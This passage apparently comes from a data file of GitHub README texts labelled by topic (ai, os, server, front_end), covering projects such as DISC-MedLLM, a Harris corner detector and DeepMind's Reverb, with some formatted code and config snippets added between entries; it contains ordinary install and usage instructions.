thinking feeling axis with an accuracy of 0 697 vs a baseline of 0 541 but the models for the other three axes did not fall that far behind their respective baselines sentiment analysis and word count on average subjects used 26 4 words per post with a neutral polarity 0 133 and moderate subjectivity 0 540 those with one of the intuitive feeling personality types tended to have higher post lengths than many of their counterparts while 
the extroversion intuitive feeling types tended to show significantly higher but still relatively neutral polarity and higher but still relatively moderate subjectivity than the other personality types
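The baseline accuracies quoted above (0.211 for the 16-class task, 0.541 for the thinking/feeling axis) are majority-class rates; a small Python sketch of how such a baseline is computed (the toy labels below are made up for illustration, not the actual dataset):

```python
# Majority-class baseline: always predict the most frequent label.
# A classifier must beat this rate to be considered informative.
from collections import Counter

def majority_baseline(labels):
    """Accuracy obtained by always predicting the most common label."""
    most_common_count = Counter(labels).most_common(1)[0][1]
    return most_common_count / len(labels)

# Toy sample skewed toward introverted-intuitive types, mirroring the
# skew described above (counts invented for illustration).
toy = ["infp"] * 4 + ["infj"] * 3 + ["intp"] * 2 + ["estj"] * 1
print(majority_baseline(toy))  # 0.4
```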
ai
pattern-kit
pattern kit pattern kit is an application that lets you preview your library of templates and manipulate their content by interacting with a form built from the schemas it is both a development tool and a public facing pattern library for a demo check out pattern kit demo https webrh patternkit int open paas redhat com installation note by following these instructions you do not need to clone this git repository create composer json at pattern library root and require pattern kit require pattern builder pattern kit dev repositories type vcs url https github com patternbuilder pattern kit add index php at pattern library root php require once dir vendor autoload php require dir vendor pattern builder pattern kit src app php app http cache run add pk config yml at pattern library root create arrays of paths to your data schema template docs and styleguide files relative to config set the file extensions for each file type list categories in order you d like them to appear in navigation add any attributes you want printed on the body tag using body attr create arrays of assets for css js and footer js including live reload if necessary title project title paths relative to your pattern library root data path to sample data schemas path to schemas templates path to templates docs path to schemas docs sg path to stylelguide docs extensions data docs json schemas json templates twig docs docs md sg sg md categories pattern sub pattern layout component atom body attr unresolved class foo bar assets css path to css path to othercss js path to js path to otherjs footer js path to footer js path to otherfooter js localhost 1336 livereload js in your terminal cd pattern library root composer install use pattern kit point mamp or local php server at your index php file php s 0 9001 t
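The pk-config.yml described above, reassembled as a YAML sketch (all paths and asset names are placeholders; the key names follow the prose description and should be checked against pattern-kit's own documentation):

```yaml
# pk-config.yml sketch, reassembled from the prose above.
# Paths are relative to the pattern library root and purely illustrative.
title: Project Title
paths:
  data: path/to/sample/data
  schemas: path/to/schemas
  templates: path/to/templates
  docs: path/to/schema/docs
  sg: path/to/styleguide/docs
extensions:
  data: json
  schemas: json
  templates: twig
  docs: md
  sg: md
categories:            # in the order they should appear in navigation
  - pattern
  - sub-pattern
  - layout
  - component
  - atom
body_attr:
  class: "foo bar"     # printed on the body tag
assets:
  css:
    - path/to.css
  js:
    - path/to.js
  footer_js:
    - path/to/footer.js
    - "//localhost:1336/livereload.js"   # live reload, if necessary
```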
os
Machine-Learning-Projects
machine learning projects dataset https img shields io badge dataset kaggle blue svg python 3 6 https img shields io badge python 3 6 brightgreen svg nltk https img shields io badge library sklearn orange svg ml readme resources machine learning png why this repository the main purpose of making this repository is to keep all my machine learning projects at one place hence keeping my github clean it looks good doesn t it overview this repository consists of all my machine learning projects datasets are provided in each of the folders above and the solution to the problem statements as well algorithms used regression linear regression multiple linear regression logistic regression polynomial regression lasso and ridge regression l1 l2 regularization elastic net regression classification k nearest neighbours support vector machine naive bayes decision tree clustering k means ensemble random forest adaptive boosting adaboost extreme gradient boosting xgboost voting hard soft do star the repository if it helped you in any way
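As a taste of the regression algorithms listed above, a dependency-free sketch of simple (one-feature) linear regression via the least-squares closed form; the repository's notebooks use sklearn, so this is only illustrative:

```python
# Simple linear regression fitted with the least-squares closed form:
#   slope = cov(x, y) / var(x),  intercept = mean(y) - slope * mean(x)
def fit_line(xs, ys):
    n = len(xs)
    mx, my = sum(xs) / n, sum(ys) / n
    cov = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    var = sum((x - mx) ** 2 for x in xs)
    slope = cov / var
    return slope, my - slope * mx

xs = [0, 1, 2, 3, 4]
ys = [1, 3, 5, 7, 9]          # exactly y = 2x + 1
slope, intercept = fit_line(xs, ys)
print(slope, intercept)       # 2.0 1.0
```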
machine-learning regression classification clustering deployment python jupyter-notebook google-colab seaborn matplotlib numpy pandas sklearn
ai
Harris-Corner-Detector
harris corner detector implementation of the harris corner detection algorithm with maxima suppression for i o and displaying the transformed image opencv is used whereas the harris corner detector is completely self implemented prerequisite software opencv http opencv org cmake http www cmake org install build instructions open a shell and cd into a directory wished to git clone in clone the repo git clone https github com alexanderb14 harris corner detector git cd into it cd harris corner detector create a build directory and cd into it mkdir build cd build run cmake and initiate the build process cmake make usage ex2 jpg file sample image files can be found in sampledata
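The repository's self-implemented detector is in C++ with OpenCV for I/O, but the core Harris response is easy to sketch; here is a dependency-free Python version on a toy image (the window size, k value, and synthetic image are my choices, not the repository's):

```python
# Harris corner response from scratch on a tiny grayscale image:
# gradients by central differences, 3x3 structure-tensor window,
# R = det(M) - k * trace(M)^2. Positive R indicates a corner.
def harris_response(img, k=0.05):
    h, w = len(img), len(img[0])
    ix = [[0.0] * w for _ in range(h)]
    iy = [[0.0] * w for _ in range(h)]
    for y in range(h):
        for x in range(1, w - 1):
            ix[y][x] = (img[y][x + 1] - img[y][x - 1]) / 2.0
    for y in range(1, h - 1):
        for x in range(w):
            iy[y][x] = (img[y + 1][x] - img[y - 1][x]) / 2.0
    r = [[0.0] * w for _ in range(h)]
    for y in range(1, h - 1):
        for x in range(1, w - 1):
            sxx = syy = sxy = 0.0
            for dy in (-1, 0, 1):
                for dx in (-1, 0, 1):
                    gx, gy = ix[y + dy][x + dx], iy[y + dy][x + dx]
                    sxx += gx * gx
                    syy += gy * gy
                    sxy += gx * gy
            det = sxx * syy - sxy * sxy
            trace = sxx + syy
            r[y][x] = det - k * trace * trace
    return r

# A 9x9 image with one bright quadrant: an L-shaped corner at (4, 4).
img = [[1.0 if x >= 4 and y >= 4 else 0.0 for x in range(9)] for y in range(9)]
r = harris_response(img)
print(r[4][4] > 0, r[4][4] > r[6][4])  # True True: corner beats the edge
```

On a straight edge one eigenvalue of the structure tensor is near zero, so det(M) vanishes and R goes negative; only where both gradient directions are strong (the corner) does R turn positive.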
ai
Parstagram
parstagram part ii this is an instagram clone with a custom parse backend that allows a user to post photos view a global photos feed and add comments time spent 5h 30 hours spent in total user stories the following required functionality is completed x user stays logged in across restarts 1pt x user can log out 1pt x user can view comments on a post 3pts x user can add a new comment 5pts video walkthrough here s a walkthrough of implemented user stories img src http g recordit co 2t91niwmdh gif title video walkthrough width alt video walkthrough parstagram part i this is an instagram clone with a custom parse backend that allows a user to post photos and view a global photos feed time spent 5 hours spent in total user stories the following required functionality is completed x user sees app icon in home screen and styled launch screen 1pt x user can sign up to create a new account 1pt x user can log in 1pt x user can take a photo add a caption and post it to the server 3pt x user can view the last 20 posts 4pts video walkthrough here s a walkthrough of implemented user stories img src http g recordit co l2tojt55ai gif title video walkthrough width alt video walkthrough
server
vraptor4
image https cloud githubusercontent com assets 1529021 7015058 0844e14c dca4 11e4 8d7b e0546b6ec74d png travis img travis maven img maven release img release license img license travis https travis ci org caelum vraptor4 travis img https travis ci org caelum vraptor4 svg branch master maven http search maven org search gav 1 g br com caelum 20and 20a vraptor maven img https maven badges herokuapp com maven central br com caelum vraptor badge svg release https github com caelum vraptor4 releases release img https img shields io github release caelum vraptor4 svg license license license img https img shields io badge license apache 202 blue svg a web mvc action based framework on top of cdi for fast and maintainable java development downloading for a quick start you can use this snippet in your maven pom xml dependency groupid br com caelum groupid artifactid vraptor artifactid version 4 2 2 version or the latest version dependency more detailed prerequisites and dependencies can be found here http www vraptor org en docs dependencies and prerequisites documentation more detailed documentation http www vraptor org en docs one minute guide and javadoc http www vraptor org javadoc are available at vraptor s website http www vraptor org en you also might be interested in our articles and presentations page http www vraptor org en docs articles and presentations building in your machine you can build vraptor by running mvn package vraptor uses maven as build tool so you can easily import it into your favorite ide contribute to vraptor do you want to contribute with code documentation or reporting a bug you can find our guideline here http www vraptor org en docs how to contribute contribute
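The maven snippet quoted above, flattened by extraction, reassembles to roughly this pom.xml fragment (version 4.2.2 as quoted; check the releases page for the latest):

```xml
<!-- pom.xml dependency for VRaptor, as described above -->
<dependency>
  <groupId>br.com.caelum</groupId>
  <artifactId>vraptor</artifactId>
  <version>4.2.2</version>
</dependency>
```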
front_end
DISC-MedLLM
disc medllm div align center generic badge https img shields io badge huggingface 20repo green svg https huggingface co flmc disc medllm license https img shields io github license modelscope modelscope svg https github com fudandisc dics medllm blob main license div div align center demo http med fudan disc com paper https arxiv org abs 2308 14346 english readme https github com fudandisc disc medllm blob main readme en md div disc medllm is a chinese medical large language model built by fudan disc http fudan disc com released together with the disc med sft training dataset https huggingface co datasets flmc disc med sft the model weights https huggingface co flmc disc medllm and an online demo http med fudan disc com the training data was constructed with llm in the loop and human in the loop procedures img src https github com fudandisc disc medllm blob main images data construction png alt data construction width 85 img src https github com fudandisc disc medllm blob main images consultation gif alt sample1 width 60 img src https github com fudandisc disc medllm blob main images advice gif alt sample2 width 60 the disc med sft dataset draws on the following sources and sizes real world ai reconstructed dialogues meddialog 400k cmedqa2 20k knowledge graph qa pairs cmekg 50k behavioral preference data 2k and general data medmcqa 8k moss sft 33k alpaca gpt4 zh 1k the dataset is available at https huggingface co datasets flmc disc med sft disc medllm is trained from baichuan 13b base https github com baichuan inc baichuan 13b and the weights are hosted on hugging face https huggingface co flmc disc medllm shell pip install r requirements txt the model can be used with hugging face transformers python import torch from transformers import automodelforcausallm autotokenizer from transformers generation utils import generationconfig tokenizer autotokenizer from pretrained flmc disc medllm use fast false trust remote code true model automodelforcausallm from pretrained flmc disc medllm device map auto torch dtype torch float16 trust remote code true model generation config generationconfig from pretrained flmc disc medllm messages messages append role user content response model chat tokenizer messages print response cli demo shell python cli demo py web demo shell streamlit run web demo py server port 8888 fine tuning follows baichuan 13b https github com baichuan inc baichuan 13b int8 int4 quantization is also supported training uses firefly https github com yangjianxin1 firefly shell deepspeed num gpus num gpus train train py train args file train train args sft json conversations follow the baichuan 13b chat format with special user and assistant tokens ids 195 and 196 we compare our model with three general purpose llms and two conversational chinese medical domain llms specifically these are gpt 3 5 and gpt 4 from openai the aligned conversational version of our backbone model baichuan 13b base baichuan 13b chat and the open source chinese conversational medical model huatuogpt 13b trained from ziya llama 13b and bianque 2 our evaluation approach
encompasses two key dimensions an assessment of conversational aptitude using gpt 4 as a reference judge and a comprehensive benchmark evaluation qa gpt 3 5 gpt 4 eval gpt 4 br qa mlec qa https github com judenpech mlec qa 306 the mlec qa contains questions from the china nmlec categorized into clinic stomatology public health traditional chinese medicine and integrated traditional chinese and western medicine we selected 1 362 questions 10 of the test set for evaluation from western medicine 306 we used a combined 270 questions from 2020 and 2021 our study involved both zero shot and few shot approaches with examples from mlec qa s validation set and 2019 western medicine 306 questions for the few shot samples few shot mlec qa mlec qa mlec qa mlec qa mlec qa 306 gpt 3 5 58 63 45 9 53 51 51 52 43 47 44 81 49 64 baichuan 13b chat 31 25 37 69 28 65 27 27 29 77 24 81 29 91 huatuo 13b 31 85 25 32 43 32 95 26 54 24 44 28 87 disc medllm 44 64 41 42 41 62 38 26 39 48 33 33 39 79 zero shot mlec qa mlec qa mlec qa mlec qa mlec qa 306 gpt 3 5 47 32 33 96 48 11 39 77 38 83 33 33 40 22 baichuan 13b chat 44 05 43 28 39 92 31 06 41 42 32 22 38 66 huatuo 13b 27 38 21 64 25 95 25 76 24 92 20 37 24 34 disc medllm 44 64 37 31 35 68 34 85 41 75 31 11 37 56 gpt 3 5 clearly outperformed others in the multiple choice assessment while our model achieved a strong second place in few shot scenarios in zero shot scenarios it followed closely behind baichuan 13b chat securing the third spot these results highlight the current priority gap in performance for conversational medical models on knowledge intensive tests like multiple choice questions chinese medical benchmark cmb clin https github com freedomintelligence cmb chinese medical dialogue dataset cmd https github com ucsd ai4h medical dialogue system chinese medical intent dataset cmid https github com imu machinelearningsxd cmid cmb clin cmd cmid br within this framework the evaluation of the dialogues is based on four criteria 
proactivity accuracy helpfulness and linguistic quality 1 proactivity the doctor can proactively and clearly request the patient to provide more information about the symptoms physical examination results and medical history when the information is insufficient actively guiding the patient through the consultation process 2 accuracy the diagnosis or advice the doctor provides is accurate and has no factual errors conclusions are not made arbitrarily 3 helpfulness the doctor s responses provide the patient with clear instructive and practical assistance specifically addressing the patient s concerns 4 linguistic quality the conversation is logical the doctor correctly understands the patient s semantics and the expression is smooth and natural cmb clin gpt3 5 4 30 4 53 4 55 5 00 4 60 gpt4 4 15 4 70 4 75 4 96 4 64 baichuan 13b caht 4 30 4 58 4 73 4 95 4 64 bianque 2 3 97 4 36 4 37 4 81 4 38 huatuo 13b 4 40 4 62 4 74 4 96 4 68 disc medllm 4 64 4 47 4 66 4 99 4 69 cmd img src https github com fudandisc disc medllm blob main images cmd png alt cmd width 75 cmid img src https github com fudandisc disc medllm blob main images cmid png alt cmid width 75 meddialog https github com ucsd ai4h medical dialogue system cmekg https github com king yyf cmekg tools cmedqa https github com zhangsheng93 cmedqa2 baichuan 13b https github com baichuan inc baichuan 13b firefly https github com yangjianxin1 firefly disc medllm angular2 misc bao2023discmedllm title disc medllm bridging general large language models and real world medical consultation author zhijie bao and wei chen and shengze xiao and kuang ren and jiaao wu and cheng zhong and jiajie peng and xuanjing huang and zhongyu wei year 2023 eprint 2308 14346 archiveprefix arxiv primaryclass cs cl
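The readme fragments above mention that conversations follow the Baichuan-13B-Chat format with special user and assistant tokens (ids 195 and 196); a sketch of how such a prompt might be assembled (the helper function and toy tokenizer are mine, and the exact layout should be checked against the official code):

```python
# Sketch: interleave Baichuan-13B-Chat-style special tokens with the
# encoded message contents. Token ids 195 (user) and 196 (assistant)
# come from the README; everything else here is illustrative.
USER_TOKEN_ID = 195
ASSISTANT_TOKEN_ID = 196

def build_input_ids(messages, encode):
    """messages: [{'role': 'user'|'assistant', 'content': str}, ...]
    encode: text -> list of token ids (e.g. a real tokenizer's encode)."""
    ids = []
    for m in messages:
        marker = USER_TOKEN_ID if m["role"] == "user" else ASSISTANT_TOKEN_ID
        ids.append(marker)
        ids.extend(encode(m["content"]))
    # A trailing assistant token prompts the model to generate a reply.
    ids.append(ASSISTANT_TOKEN_ID)
    return ids

# Toy "tokenizer" for demonstration only: one id per character.
toy_encode = lambda text: [ord(c) for c in text]
print(build_input_ids([{"role": "user", "content": "hi"}], toy_encode))
# [195, 104, 105, 196]
```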
ai
PythonBootcamp
pythonbootcamp python scripting and automation python game development web scraping beautiful soup selenium web driver request wtforms data science pandas numpy matplotlib plotly scikit learn seaborn turtle python gui desktop app development tkinter front end web development html 5 css 3 bootstrap 4 bash command line git github and version control backend web development flask rest apis databases sql sqlite postgresql authentication web design deployment with github pages heroku and gunicorn
server
code
mastering opencv with practical computer vision projects full source code for the book source code https github com masteringopencv code book http www packtpub com cool projects with opencv book copyright packt publishing 2012 to build run the projects for the book install opencv versions between 2 4 2 to 2 4 11 are supported whereas opencv 3 0 is not yet supported eg go to http opencv org click on downloads download the latest opencv 2 4 version including prebuilt library and extract it to c opencv for windows or opencv for linux in opencv v2 4 3 the prebuilt opencv library is in c opencv build or opencv build such as c opencv build x64 vc9 for ms visual studio 2008 or vs10 folder for ms visual studio 2010 or the x86 parent folder for 32 bit windows install all the source code of the book eg extract the code to c masteringopencv for windows or masteringopencv for linux install cmake v2 8 or later from http www cmake org each chapter of the book is for a separate project therefore there are 9 projects for the 9 chapters remember that chapter 9 is an online chapter that can be downloaded from http www packtpub com cool projects with opencv book you can run each project separately they each contain a readme md text file describing how to build that project using cmake in most cases because cmake can be used with many compilers and many operating systems chapters ch1 cartoonifier and skin changer for android by shervin emami ch2 marker based augmented reality on iphone or ipad by khvedchenia ievgen ch3 marker less augmented reality by khvedchenia ievgen ch4 exploring structure from motion using opencv by roy shilkrot ch5 number plate recognition using svm and neural networks by david escriv ch6 non rigid face tracking by jason saragih ch7 3d head pose estimation using aam and posit by daniel l lis baggio ch8 face recognition using eigenfaces or fisherfaces by shervin emami ch9 developing fluid wall using the microsoft kinect by naureen mahmood what you need for this 
book you don t need to have special knowledge in computer vision to read this book but you should have good c c programming skills and basic experience with opencv before reading this book readers without experience in opencv may wish to read the book learning opencv for an introduction to the opencv features or read opencv 2 cookbook for examples on how to use opencv with recommended c c patterns because mastering opencv with practical computer vision projects will show you how to solve real problems assuming you are already familiar with the basics of opencv and c c development in addition to c c and opencv experience you will also need a computer and an ide of your choice such as visual studio xcode eclipse or qtcreator running on windows mac or linux some chapters have further requirements particularly to develop the android app you will need an android device android development tools and basic android development experience to develop the ios app you will need an iphone ipad or ipod touch device ios development tools including an apple computer xcode ide and an apple developer certificate and basic ios and objective c development experience several desktop projects require a webcam connected to your computer any common usb webcam should suffice but a webcam of at least 1 megapixel may be desirable cmake is used in most projects including opencv itself to build across operating systems and compilers a basic understanding of build systems is required and knowledge of cross platform building is recommended an understanding of linear algebra is expected such as basic vector and matrix operations and eigen decomposition per chapter requirements ch1 webcam for desktop app or android development system for android app ch2 ios development system to build an ios app ch3 opengl built into opencv ch4 pcl http pointclouds org and ssba http www inf ethz ch personal chzach opensource html ch5 nothing ch6 nothing but requires training data for execution ch7 nothing ch8 
webcam ch9 kinect depth sensor screenshots ch1 cartoonifier and skin changer for android ch1 cartoonifier and skin changer for android https raw github com masteringopencv code master chapter1 androidcartoonifier screenshot png ch2 marker based augmented reality on iphone or ipad ch2 marker based augmented reality on iphone or ipad https raw github com masteringopencv code master chapter2 iphonear screenshot png ch3 marker less augmented reality ch3 marker less augmented reality https raw github com masteringopencv code master chapter3 markerlessar screenshot png ch4 exploring structure from motion using opencv ch4 exploring structure from motion using opencv https raw github com masteringopencv code master chapter4 structurefrommotion screenshot png ch5 number plate recognition using svm and neural networks ch5 number plate recognition using svm and neural networks https raw github com masteringopencv code master chapter5 numberplaterecognition screenshot png ch6 non rigid face tracking ch6 non rigid face tracking https raw github com masteringopencv code master chapter6 nonrigidfacetracking screenshot png ch7 3d head pose estimation using aam and posit ch7 3d head pose estimation using aam and posit https raw github com masteringopencv code master chapter7 headposeestimation screenshot png ch8 face recognition using eigenfaces or fisherfaces ch8 face recognition using eigenfaces or fisherfaces https raw github com masteringopencv code master chapter8 facerecognition screenshot png ch9 developing fluid wall using the microsoft kinect ch9 developing fluid wall using the microsoft kinect https raw github com masteringopencv code master chapter9 fluidinteractionusingkinect screenshot png
ai
reverb
reverb pypi python version https img shields io pypi pyversions dm reverb pypi version https badge fury io py dm reverb svg https badge fury io py dm reverb reverb is an efficient and easy to use data storage and transport system designed for machine learning research reverb is primarily used as an experience replay system for distributed reinforcement learning algorithms but the system also supports multiple data structure representations such as fifo lifo and priority queues table of contents installation installation quick start quick start detailed overview detailed overview tables tables item selection strategies item selection strategies rate limiting rate limiting sharding sharding checkpointing checkpointing citation citation installation please keep in mind that reverb is not hardened for production use and while we do our best to keep things in working order things may break or segfault warning reverb currently only supports linux based oses the recommended way to install reverb is with pip we also provide instructions to build from source using the same docker images we use for releases tensorflow can be installed separately or as part of the pip install installing tensorflow as part of the install ensures compatibility shell pip install dm reverb tensorflow without tensorflow install and version dependency check pip install dm reverb nightly builds pypi version https badge fury io py dm reverb nightly svg https badge fury io py dm reverb nightly shell pip install dm reverb nightly tensorflow without tensorflow install and version dependency check pip install dm reverb nightly debug builds starting with version 0 6 0 debug builds of reverb are uploaded to google cloud storage the builds can be downloaded or installed directly via pip following the patterns below gsutils can be used to navigate the directory structure to ensure the files are there e g gsutil ls gs rl infra builds dm reverb builds dbg to build your own debug binary see the build 
instructions: https://github.com/deepmind/reverb/tree/master/reverb/pip_package.

To create a stable Reverb release for Python 3.8 and 3.9, follow this pattern:

```shell
export REVERB_VERSION=0.8.0
# Python 3.9
export PYTHON_VERSION=39
pip install https://storage.googleapis.com/rl-infra-builds/dm_reverb/builds/dbg/${REVERB_VERSION}/dm_reverb-${REVERB_VERSION}-cp${PYTHON_VERSION}-cp${PYTHON_VERSION}-manylinux2010_x86_64.whl
```

### Build from source

[This guide](reverb/pip_package/README.md#how-to-develop-and-build-reverb-with-the-docker-containers) details how to develop and build Reverb with the Docker containers, and how to build Reverb from source.

### Reverb releases

Due to some underlying libraries (such as protoc and absl), Reverb has to be paired with a specific version of TensorFlow. If installing Reverb as `pip install dm-reverb[tensorflow]`, the correct version of TensorFlow will be installed. The table below lists the version of TensorFlow that each release of Reverb is associated with, and some versions of interest:

- 0.13.0 dropped Python 3.8 support.
- 0.11.0 is the first version to support Python 3.11.
- 0.10.0 is the last version to support Python 3.7.

| Release | Branch / Tag | TensorFlow version |
|---------|--------------|--------------------|
| Nightly | [master](https://github.com/deepmind/reverb) | tf-nightly |
| 0.13.0 | [v0.13.0](https://github.com/deepmind/reverb/tree/v0.13.0) | 2.14.0 |
| 0.12.0 | [v0.12.0](https://github.com/deepmind/reverb/tree/v0.12.0) | 2.13.0 |
| 0.11.0 | [v0.11.0](https://github.com/deepmind/reverb/tree/v0.11.0) | 2.12.0 |
| 0.10.0 | [v0.10.0](https://github.com/deepmind/reverb/tree/v0.10.0) | 2.11.0 |
| 0.9.0 | [v0.9.0](https://github.com/deepmind/reverb/tree/v0.9.0) | 2.10.0 |
| 0.8.0 | [v0.8.0](https://github.com/deepmind/reverb/tree/v0.8.0) | 2.9.0 |
| 0.7.x | [v0.7.0](https://github.com/deepmind/reverb/tree/v0.7.0) | 2.8.0 |

## Quick start

Starting a Reverb server is as simple as:

```python
import reverb

server = reverb.Server(tables=[
    reverb.Table(
        name='my_table',
        sampler=reverb.selectors.Uniform(),
        remover=reverb.selectors.Fifo(),
        max_size=100,
        rate_limiter=reverb.rate_limiters.MinSize(1)),
    ],
)
```

Create a client to communicate with the server:

```python
client = reverb.Client(f'localhost:{server.port}')
print(client.server_info())
```

Write some data to the table:

```python
# Creates a single item and data element [0, 1].
client.insert([0, 1], priorities={'my_table': 1.0})
```

An item can also reference multiple data elements:

```python
# Appends three data elements and inserts a single item which references
# all of them as {'a': [2, 3, 4], 'b': [12, 13, 14]}.
with client.trajectory_writer(num_keep_alive_refs=3) as writer:
  writer.append({'a': 2, 'b': 12})
  writer.append({'a': 3, 'b': 13})
  writer.append({'a': 4, 'b': 14})

  # Create an item referencing all the data.
  writer.create_item(
      table='my_table',
      priority=1.0,
      trajectory={
          'a': writer.history['a'][:],
          'b': writer.history['b'][:],
      })

  # Block until the item has been inserted and confirmed by the server.
  writer.flush()
```

The items we have added to Reverb can be read by sampling them:

```python
# client.sample() returns a generator.
print(list(client.sample('my_table', num_samples=2)))
```

Continue with the [Reverb tutorial](https://github.com/deepmind/reverb/tree/master/examples/demo.ipynb) for an interactive tutorial.

## Detailed overview

Experience replay has become an important tool for training off-policy reinforcement learning policies. It is used by algorithms such as Deep Q-Networks ([DQN][DQN]), Soft Actor-Critic ([SAC][SAC]), Deep Deterministic Policy Gradients ([DDPG][DDPG]), and Hindsight Experience Replay ([HER][HER]). However, building an efficient, easy-to-use, and scalable replay system can be challenging.

For good performance, Reverb is implemented in C++, and to enable distributed usage it provides a gRPC service for adding, sampling, and updating the contents of the tables. Python clients expose the full functionality of the service in an easy-to-use fashion. Furthermore, native TensorFlow ops are available for performant integration with TensorFlow and `tf.data`.

Although originally designed for off-policy reinforcement learning, Reverb's flexibility makes it just as useful for on-policy reinforcement or even (un)supervised learning. Creative users have even used Reverb to store and distribute frequently updated data (such as model weights), acting as an in-memory, lightweight alternative to a distributed file system where each table represents a file.

### Tables

A Reverb server consists of one or more tables. A table holds items, and each item references one or more data elements. Tables also define sample and removal [selection strategies](#item-selection-strategies), a maximum item capacity, and a [rate limiter](#rate-limiting).

Multiple items can reference the same data element, even if these items exist in different tables. This is because items only contain references to data elements, as opposed to a copy of the data itself. This also means that a data element is only removed when there exists no item that contains a reference to it.

For example, it is possible to set up one table as a prioritized experience replay ([PER][PER]) for transitions (sequences of length 2), and another table as a FIFO queue of sequences of length 3. In this case the PER data could be used to train DQN, and the FIFO data to train a transition model for the environment.

![Using multiple tables](docs/images/multiple_tables_example.png)

Items are automatically removed from the table when one of two conditions is met:

1. Inserting a new item would cause the number of items in the table to exceed its maximum capacity. The table's removal strategy is used to determine which item to remove.
2. An item has been sampled more than the maximum number of times permitted by the table's rate limiter. Such an item is deleted.

Data elements not referenced anymore by any item are also deleted.

Users have full control over how data is sampled and removed from Reverb tables. The behavior is primarily controlled by the [item selection strategies](#item-selection-strategies) provided to the table as the `sampler` and `remover`. In combination with the [rate limiter](#rate-limiting) and `max_times_sampled`, a wide range of behaviors can be achieved. Some commonly used configurations include:

**Uniform experience replay**

A set of N=1000 most recently inserted items is maintained. By setting `sampler=reverb.selectors.Uniform()`, the probability to select an item is the same for all items. Due to `reverb.rate_limiters.MinSize(100)`, sampling requests will block until 100 items have been inserted. By setting `remover=reverb.selectors.Fifo()`, when an item needs to be removed the oldest item is removed first.

```python
reverb.Table(
     name='my_uniform_experience_replay_buffer',
     sampler=reverb.selectors.Uniform(),
     remover=reverb.selectors.Fifo(),
     max_size=1000,
     rate_limiter=reverb.rate_limiters.MinSize(100),
)
```

Examples of algorithms that make use of uniform experience replay include SAC and DDPG.

**Prioritized experience replay**

A set of N=1000 most recently inserted items. By setting `sampler=reverb.selectors.Prioritized(priority_exponent=0.8)`, the probability to select an item is proportional to the item's priority.

Note: see Schaul, Tom, et al. [PER][PER] for the algorithm used in this implementation of prioritized experience replay.

```python
reverb.Table(
     name='my_prioritized_experience_replay_buffer',
     sampler=reverb.selectors.Prioritized(0.8),
     remover=reverb.selectors.Fifo(),
     max_size=1000,
     rate_limiter=reverb.rate_limiters.MinSize(100),
)
```

Examples of algorithms that make use of prioritized experience replay are DQN (and its variants) and Distributed Distributional Deterministic Policy Gradients ([D4PG][D4PG]).

**Queue**

Collection of up to N=1000 items where the oldest item is selected and removed in the same operation. If the collection contains 1000 items, then insert calls are blocked until it is no longer full; if the collection is empty, then sample calls are blocked until there is at least one item.

```python
reverb.Table(
     name='my_queue',
     sampler=reverb.selectors.Fifo(),
     remover=reverb.selectors.Fifo(),
     max_size=1000,
     max_times_sampled=1,
     rate_limiter=reverb.rate_limiters.Queue(size=1000),
)

# Or use the helper classmethod `.queue`.
reverb.Table.queue(name='my_queue', max_size=1000)
```

Examples of algorithms that make use of queues are [IMPALA](https://arxiv.org/abs/1802.01561) and asynchronous implementations of [Proximal Policy Optimization](https://arxiv.org/abs/1707.06347).

### Item selection strategies

Reverb defines several selectors that can be used for item sampling or removal:

- **Uniform**: samples uniformly among all items.
- **Prioritized**: samples proportional to stored priorities.
- **FIFO**: selects the oldest data.
- **LIFO**: selects the newest data.
- **MinHeap**: selects data with the lowest priority.
- **MaxHeap**: selects data with the highest priority.

Any of these strategies can be used for sampling or removing items from a table. This gives users the flexibility to create customized tables that best fit their needs.

### Rate limiting

Rate limiters allow users to enforce conditions on when items can be inserted and/or sampled from a table. Here is a list of the rate limiters that are currently available in Reverb:

- **MinSize**: sets a minimum number of items that must be in the table before anything can be sampled.
- **SampleToInsertRatio**: enforces the average ratio of inserts to samples by blocking insert and/or sample requests. This is useful for controlling the number of times each item is sampled before being removed.
- **Queue**: items are sampled exactly once before being removed.
- **Stack**: items are sampled exactly once before being removed.

### Sharding

Reverb servers are unaware of each other, and when scaling up a system to a multi-server setup data is not replicated across more than one node. This makes Reverb unsuitable as a traditional database, but has the benefit of making it trivial to scale up systems where some level of data loss is acceptable.

Distributed systems can be horizontally scaled by simply increasing the number of Reverb servers. When used in combination with a gRPC-compatible load balancer, the address of the load-balanced target can simply be provided to a Reverb client, and operations will automatically be distributed across the different nodes. You'll find details about the specific behaviors in the documentation of the relevant methods and classes.

If a load balancer is not available in your setup, or if more control is required, then systems can still be scaled in almost the same way: simply increase the number of Reverb servers and create separate clients for each server.

### Checkpointing

Reverb supports checkpointing: the state and content of Reverb servers can be stored to permanent storage. While checkpointing, the server serializes all of its data and the metadata needed to reconstruct it. During this process the server blocks all incoming insert, sample, update, and delete requests.

Checkpointing is done with a call from the Reverb client:

```python
# client.checkpoint() returns the path the checkpoint was written to.
checkpoint_path = client.checkpoint()
```

To restore the Reverb server from a checkpoint:

```python
# The checkpointer accepts the path of the root directory in which checkpoints
# are written. If we pass the root directory of the checkpoints written above,
# then the new server will load the most recent checkpoint written from the
# old server.
checkpointer = reverb.platform.checkpointers_lib.DefaultCheckpointer(
    path=checkpoint_path.rsplit('/', 1)[0])

# The arguments passed to `tables=` must be the same as those used by the
# server that wrote the checkpoint.
server = reverb.Server(tables=[...], checkpointer=checkpointer)
```

Refer to [tfrecord_checkpointer.h](https://github.com/deepmind/reverb/tree/master/reverb/cc/platform/tfrecord_checkpointer.h) for details on the implementation of checkpointing in Reverb.

### Starting Reverb using reverb_server (beta)

Installing `dm-reverb` using pip will install a `reverb_server` script, which accepts its config as a textproto. For example:

```bash
reverb_server --config="
port: 8000
tables: {
  table_name: \"my_table\"
  sampler: { fifo: true }
  remover: { fifo: true }
  max_size: 200
  max_times_sampled: 5
  rate_limiter: {
    min_size_to_sample: 1
    samples_per_insert: 1
    min_diff: -$(python3 -c 'import sys; print(sys.float_info.max)')
    max_diff: $(python3 -c 'import sys; print(sys.float_info.max)')
  }
}"
```

The rate limiter config is equivalent to the Python expression `MinSize(1)` (see `rate_limiters.py`).

## Citation

If you use this code, please cite [the Reverb paper](https://arxiv.org/abs/2102.04736) as:

```bibtex
@misc{cassirer2021reverb,
    title={Reverb: A Framework For Experience Replay},
    author={Albin Cassirer and Gabriel Barth-Maron and Eugene Brevdo and Sabela Ramos and Toby Boyd and Thibault Sottiaux and Manuel Kroiss},
    year={2021},
    eprint={2102.04736},
    archivePrefix={arXiv},
    primaryClass={cs.LG}
}
```

<!-- Links to papers go here. -->
